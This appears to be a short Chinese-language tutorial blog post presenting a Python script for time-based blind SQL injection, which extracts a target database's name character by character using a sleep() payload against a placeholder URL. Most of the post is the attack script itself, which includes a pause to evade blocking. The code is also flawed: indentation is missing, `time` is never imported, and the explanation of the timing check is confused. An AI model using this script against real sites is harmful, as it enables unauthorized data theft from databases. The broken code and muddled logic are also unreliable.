python 盲注脚本

Python盲注脚本是指一种利用Python编写的脚本程序，用于针对数据库进行盲注（blind injection）攻击的技术。

# 导入必要的模块
import requests
import string
# 定义待猜想的字符集
all_chars = string.ascii_letters + string.digits  # 所有的字母和数字
# 目标URL
url = 'http://example.com/sql.php?id=1'
# 已猜中的字段
known_field = '' 
# 循环猜解字段
while True:
for c in all_chars:
# 构造payload，用于发送要求
payload = "1' and if(substring(database(),%d,1)='%s',sleep(10),0)-- -" % (len(known_field)+1, c)
try:
# 发送攻击要求
response = requests.get(url + payload, timeout=5)
except:
# 接收异常误差
known_field += c
print(known_field)  # 输出结果
time.sleep(2) # 避免被封杀，休眠2秒后再发送
break

接下来我们解释一下这个脚本的具体实现：

首先，我们导入所需的模块requests和string。

然后，定义带猜想的字符集all_chars。

接着，我们定义目标URL和已猜中的字段known_field。

最后，在一个while循环中，我们使用for循环对all_chars中的字符进行逐一猜解。我们构造payload并发送攻击要求，如果正常情况下无响应时间，则说明我们猜对了一名字符。因而我们将该字符添加到known_field中，休眠2秒后再继续发送下一个要求。

这样，我们就能够通过Python盲注脚本实现对目标数据库的盲注攻击，并获得所需信息。